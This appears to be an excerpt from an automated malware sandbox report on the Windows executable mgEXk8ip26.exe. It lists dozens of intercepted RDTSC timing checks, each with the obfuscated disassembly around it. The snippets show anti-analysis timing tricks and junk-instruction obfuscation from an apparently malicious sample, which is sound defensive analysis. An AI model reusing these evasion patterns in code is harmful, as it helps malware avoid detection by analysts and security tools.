      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAC340 second address: BAC344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAF454 second address: BAF46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007FA39851835Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BAF46F second address: BAF473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB3843 second address: BB3847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB3847 second address: BB386F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39874704Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA39874704Dh 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB386F second address: BB3873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB3873 second address: BB3877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB39D3 second address: BB39EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FA398518356h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB39EF second address: BB39F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB39F3 second address: BB3A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FA39851835Bh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jg 00007FA398518368h 0x00000018 push eax 0x00000019 push edx 0x0000001a jnl 00007FA398518356h 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB2383 second address: BB239D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747056h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB8C7C second address: BB8C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB8C80 second address: BB8C86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB8C86 second address: BB8C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB8C91 second address: BB8CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnc 00007FA398747046h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB8056 second address: BB805C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB81D4 second address: BB81D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB81D8 second address: BB81E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA39851835Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB81E6 second address: BB8206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 jmp 00007FA398747057h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB8206 second address: BB820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB820C second address: BB8213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB84FD second address: BB8505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB8B32 second address: BB8B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB94F6 second address: BB954A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39851835Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FA398518363h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007FA398518365h 0x0000001b jnl 00007FA398518356h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA39851835Bh 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB954A second address: BB954E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB9829 second address: BB982D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB982D second address: BB9833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB9947 second address: BB9951 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA398518356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB9951 second address: BB9957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BB9A0B second address: BB9A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBA076 second address: BBA089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39874704Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBA200 second address: BBA217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA398518362h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBA217 second address: BBA21D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBA570 second address: BBA57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBA75E second address: BBA77E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747058h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBABF5 second address: BBABFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBABFA second address: BBAC00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBAC00 second address: BBAC88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA39851835Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, edx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FA398518358h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c sub esi, dword ptr [ebp+122D1A07h] 0x00000032 push eax 0x00000033 call 00007FA39851835Bh 0x00000038 mov dword ptr [ebp+122D3986h], edi 0x0000003e pop esi 0x0000003f pop edi 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FA398518358h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push eax 0x0000005d je 00007FA398518364h 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBAC88 second address: BBAC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBB687 second address: BBB6AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FA398518356h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBC5E4 second address: BBC5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBC5E8 second address: BBC5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBD0AA second address: BBD0AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBD0AE second address: BBD0B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBD0B2 second address: BBD13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov si, bx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FA398747048h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov di, si 0x0000002b jmp 00007FA398747057h 0x00000030 xchg eax, ebx 0x00000031 jmp 00007FA398747056h 0x00000036 push eax 0x00000037 pushad 0x00000038 jnc 00007FA398747054h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA398747057h 0x00000045 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBD8CB second address: BBD8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBE343 second address: BBE37A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747058h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FA398747057h 0x00000013 jmp 00007FA398747051h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBD8CF second address: BBD8D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBEE34 second address: BBEE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA398747059h 0x0000000a popad 0x0000000b push eax 0x0000000c jg 00007FA398747054h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBFB5C second address: BBFB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBEE5E second address: BBEE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBFB60 second address: BBFBA1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA398518356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA398518366h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edi, edx 0x00000015 push 00000000h 0x00000017 mov esi, 1C19B1B1h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f xor esi, dword ptr [ebp+122D2AAFh] 0x00000025 pop edi 0x00000026 push eax 0x00000027 push ebx 0x00000028 jnp 00007FA39851835Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC1B3E second address: BC1B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B78F6C second address: B78F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA398518366h 0x00000009 pop esi 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B758A5 second address: B758AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B758AE second address: B758B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: B758B4 second address: B758BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC67ED second address: BC6802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA398518356h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC7748 second address: BC7766 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747053h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC7766 second address: BC776C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC691D second address: BC6921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC877E second address: BC878B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC878B second address: BC8795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA398747046h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC8795 second address: BC87E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub ebx, 5780B40Fh 0x0000000f mov dword ptr [ebp+122D2786h], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FA398518358h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 sub edi, dword ptr [ebp+122D295Bh] 0x00000037 push 00000000h 0x00000039 jmp 00007FA39851835Bh 0x0000003e add dword ptr [ebp+122D23FBh], ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC9930 second address: BC99B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA398747046h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push dword ptr fs:[00000000h] 0x00000016 adc di, B803h 0x0000001b mov dword ptr [ebp+122D1837h], ebx 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007FA398747048h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 mov dword ptr [ebp+122D27A9h], esi 0x00000048 mov eax, dword ptr [ebp+122D0041h] 0x0000004e push 00000000h 0x00000050 push edx 0x00000051 call 00007FA398747048h 0x00000056 pop edx 0x00000057 mov dword ptr [esp+04h], edx 0x0000005b add dword ptr [esp+04h], 00000018h 0x00000063 inc edx 0x00000064 push edx 0x00000065 ret 0x00000066 pop edx 0x00000067 ret 0x00000068 mov dword ptr [ebp+122D27B3h], esi 0x0000006e push FFFFFFFFh 0x00000070 and di, 5E70h 0x00000075 nop 0x00000076 pushad 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC99B4 second address: BC99EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 je 00007FA398518367h 0x0000000b jmp 00007FA398518361h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA398518367h 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BC99EC second address: BC99FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA398747046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCC82D second address: BCC8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA39851835Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ebx, dword ptr [ebp+122D29CFh] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FA398518358h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov dword ptr [ebp+1246C1CFh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007FA398518358h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 sub dword ptr [ebp+122D265Dh], esi 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b js 00007FA39851835Ch 0x00000061 jbe 00007FA398518356h 0x00000067 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCC8A5 second address: BCC8AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCD7C9 second address: BCD7E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCD7E1 second address: BCD7E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCEA35 second address: BCEA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCF9D7 second address: BCFA66 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA398747046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FA398747048h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007FA398747048h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 sub dword ptr [ebp+122D3443h], ebx 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007FA398747048h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 0000001Ch 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 xchg eax, esi 0x00000064 js 00007FA39874705Bh 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FA39874704Dh 0x00000071 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BCDAE0 second address: BCDAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BD195C second address: BD1961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BD27FA second address: BD2883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 nop 0x00000009 mov ebx, esi 0x0000000b push 00000000h 0x0000000d and edi, dword ptr [ebp+122D2837h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FA398518358h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D3794h], esi 0x00000035 mov bl, B6h 0x00000037 xchg eax, esi 0x00000038 push ebx 0x00000039 pushad 0x0000003a jmp 00007FA398518367h 0x0000003f push eax 0x00000040 pop eax 0x00000041 popad 0x00000042 pop ebx 0x00000043 push eax 0x00000044 pushad 0x00000045 jl 00007FA398518366h 0x0000004b jmp 00007FA398518360h 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FA398518362h 0x00000057 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BD7457 second address: BD7461 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA398747046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
